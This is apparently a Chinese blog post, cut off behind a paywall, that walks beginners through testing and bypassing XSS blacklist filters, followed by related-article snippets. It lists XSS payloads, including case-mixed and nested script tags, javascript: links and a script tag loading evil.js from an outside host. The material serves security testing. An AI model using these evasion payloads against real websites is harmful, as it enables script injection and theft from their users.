Bypass xss过滤的测试方法

最新推荐文章于 2022-07-28 19:15:00 发布
最新推荐文章于 2022-07-28 19:15:00 发布
阅读量784 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/h4ck0ne/article/details/50570761
版权

0x00 背景

本文来自于《Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters》其中的bypass xss过滤的部分,前面有根据WAF特征确定是哪个WAF的测试方法给略过了,重点来看一下后面绕xss的一些基本的测试流程,虽说是绕WAF的,但这里还是根据WAF中的正则缺陷来绕过测试方法,并不是协议上问题,所以呢,基本可以通用于其他xss过滤的场景。方便新手们比较快速的了解到测试xss的一些基本的方法。

0x01 Bypassing黑名单

大多数的场所是用的黑名单来做过滤器的,有三种方式绕过黑名单的测试:

1、暴力测试(输入大量的payload,看返回结果)

2、根据正则推算

3、利用浏览器bug

初步测试

1)尝试插入比较正常的HTML标签,例如:<b><i><u>来看一下返回页面的情况是怎样的,是否被HTML编码了,或者标签被过滤了。

2)尝试插入不闭合的标签,例如:<b<i<u<marquee然后看一下返回响应,是否对开放的标签也有过滤。

3)然后测试几个XSSpayload,基本所有的xss过滤器都会进行过滤的:

<script>alert(1);</script>

<script>prompt(1);</script>

<script>confirm(1);</script>

<scriptsrc="http://rhainfosec.com/evil.js">

看返回响应,是过滤的全部,还是只过滤了部分,是否还留下了alert,prompt,confirm字符,再尝试大小写的组合:

<scRiPt>alert(1);</scrIPt>

4)如果过滤器仅仅是把<script></script>标签过滤掉,那么可以用

<scr<script>ipt>alert(1)</scr<script>ipt>

的方式来绕过,这样当<script>标签被过滤掉,剩下的组合起来刚好形成一个完整的payload

5)<a href标签来测试,看返回响应

<a href="http://www.google.com">Clickme</a>

<a标签是否被过滤 href是否被过滤 href里的数据是否被过滤

如果没有数据被过滤,插入javascript协议看看:

<a href="javascript:alert(1)">Clickme</a>

是否返回错误 javascript的整个协议内容是否都被过滤掉,还是只过滤了javascript字符 尝试下大小写转换

继续测试事件触发执行

最低0.47元/天 解锁文章
「已注销」
关注
C# 实现 java URLEncoder.encode编码
别看,很懒,随心
09-08 2872
** 最近碰到一个很坑很难受的问题,公司对接一个java项目碰到C# url编码跟java url编码后不一样,导致最后加密结果不一样 ** C# 中文url编码后是小写的 java 中文url编码后是大写的,且会对非安全字符进行编码 不说了,直接上码: 这里得注意一下,有些地方个别情况特殊符号没进行编码的,还是得自己手动Replace一下对应编码 public static class Utils { private static string UrlEncode(this str
XSS-过滤特殊符号的正则绕过
最新发布
ningwangh的博客
08-18 1204
所以将alert转化成30进制。
XSS bypass
yggcwhat
05-01 1004
XSS bypass
XSSBypass:XSS绕过技术
05-17
- 开启XSS防护机制:许多现代浏览器提供了内置的XSS过滤功能,合理配置可以增加网站的安全性。 5. **XSS PoC(Proof of Concept)** - PoC是证明XSS漏洞存在的实际示例。通常包含一个能触发XSS的特定输入,用于...
xssbypass_XSS易容术---bypass之编码混淆篇+辅助脚本编写
weixin_42377407的博客
12-23 429
一、前言本文原创作者:vk,本文属i春秋原创奖励计划,未经许可禁止转载!很多人对于XSS的了解不深。很多时候,我们的一些关键字被过滤。直接闭合前面payload,插入测试语句,是弹不出窗的。原因有很多,过滤方式也有很多,所以绕过的姿势自然也不少。今天跟大家分享bypass之编码混淆。二、正文1、总括很多时候,我们的一些关键字被过滤。直接闭合前面payload,插入测试语句alert(/xss/),...
xss常见的bypass方案
03-06
以下是一些常见的XSS bypass技巧和方法: 1. **编码与解码**:攻击者可能会尝试使用各种编码方式来逃避过滤机制,如URL编码(%编码)、HTML实体编码、JavaScript编码等。例如,将 `<script>` 标签转换为 `%3Cscript...
XSS过滤绕过
聚鼎安全
01-20 1583
目录过滤测试示例输入在script标签中非常规的事件监听HREF内容可控变换JavaScript变换Vbscript变换输入在属性里JSONSVG标签浏览器bug常见标签利用link远程包含js文件javascript伪协议属性payload常用的payload各种alert伪协议Chrome XSS auditor bypass长度限制jquery sourceMappingURL图片名过期的payloadcssmarkdowniframeformmeta绕过过滤空格大小写混淆双写绕过字符拼接编码绕过编码
XSS Bypass
Grey的博客
07-30 1249
1. XSS攻击原理 XSS原称为CSS(Cross-Site Scripting),因为和层叠样式表(Cascading Style Sheets)重名,所以改称为XSS(X一般有未知的含义,还有扩展的含义)。XSS攻击涉及到三方:攻击者,用户,web server。用户是通过浏览器来访问web server上的网页,XSS攻击就是攻击者通过各种办法,在用户访问的网页中插入自己的脚本,让其在用...
XSS————2、XSS bypass
Fly_鹏程万里
10-19 1637
0x00前言 XSS有反射、存储、DOM三种类型,不同类型的xss的危害各不相同,下面做一个简要说明: 数据流向: 反射型:浏览器——》后端——》浏览器 存储型:浏览器——》后端——》数据库——》后端——》浏览器 DOM型:URL——》浏览器 易用程度: 存储型 &gt; DOM型 &gt; 反射型 接下来我们就进入正题————“XSS技巧”,在本篇文章当中我们将对xss绕过技巧做一个系统...
xssbypass_XSS Bypass
weixin_36463451的博客
12-23 285
如果无法学会绕过,那就只有一个结果:Bypass学习文章来源:米斯特安全团队JS代码往往要在标签内或者在 “On” 事件和 “javascript” 伪协议内才可以执行。标签表达式: 没被安全狗过滤的标签:a b q br dd dl dt h1 h2 h3 h4 h5 h6 hr bdi bdo big del dfn dir div kbd map var wbr abbr area base...
8. xss bypass
HWHXY的博客
01-17 289
layout: post title: 8. xss bypass category: SRC tags: SRC keywords: SRC,XSS 前言 该篇记录为记录实际的src过程第8篇小文章,内容为某网站的xssbypassXSS特征 这个点是一处app发布,可以插入a标签和img标签,但是a标签只能插入链接,否则会出错。条件很苛刻。 这时就想到了再找一个反射,把反射链接插进去,就相当于a+反射=点击存储。思路正确!开始找反射,好不容易找到一个,但是waf极强, on属性基本被消灭,遗留下来.
3. XSS_ByPass
HWHXY的博客
01-17 258
layout: post title: 3. XSS_ByPass category: SRC tags: SRC keywords: SRC,XSS 前言 该篇记录为记录实际的src过程第3篇小文章,内容为某网站的xssbypassxss特征 在修改个人头像信息的地方没有过滤" and <,导致了这次的xss的触发,而我认为,基本所有的如上情况都是有很大可能触发xss的。后端存在一些waf,存在的形式是黑名单。例如: <script>,<a>这样的形式均会将<&.
XSS Bypass Cookbook
晓川吖的专栏
09-13 315
1 引言 在目前的web安全漏洞中,xss一直属于热门的一类,而它对用户造成的危害较大。 因此也引发了不少安全爱好者和专业工程师的研究。 而html5等新技术的使用和具体业务场景中复杂的环境带给了xss更大的生存空间。 而且不同xss向量也因为浏览器的特性会有所区别 比如chrome在加载资源时会校验服务器返回的mimeType 而firefox则根据标签自己设定的type来做出处理 本文在目前较为常见的几种过滤条件下,简单的探讨了xss这一技术的应用以及绕过 1.1 研究范围 XSS在各种具体业.
XSS测试
qq_52016943的博客
07-28 1545
XSS 绕过
html中的基本标签
weixin_44956916的博客
09-12 186
Day 01学习笔记 一、讲在前面的知识 1.1 前端开发工程师在整个开发流程中的位置 产品经理:提需求 UI设计师 前端设计师 后端工程师 测试工程师 1.2 前后端开发 前端:也叫客户端 后端:也叫服务端 1.3软件结构 B/S:浏览器/服务器 客户端设备上有浏览器就可以 ​ 优点:免安装,更新更及时 ​ 缺点:没一次需要现下载代码,速度较c/s慢 C/S:客户端/服务器 需要在客户端设备上安装客户端软件 ​ 优点:速度快 ​ 缺点: 1
Web应用安全测试:XSS过滤器逃逸和WAF绕过技术
"XSS Filter Evasion and WAF Bypassing" ...5. XSS 测试的技巧和方法 6. Web 应用程序安全的 importance 和挑战 通过学习本文档,读者将对 XSS 攻击和防御机制有更深入的理解,并能够更好地保护 Web 应用程序的安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值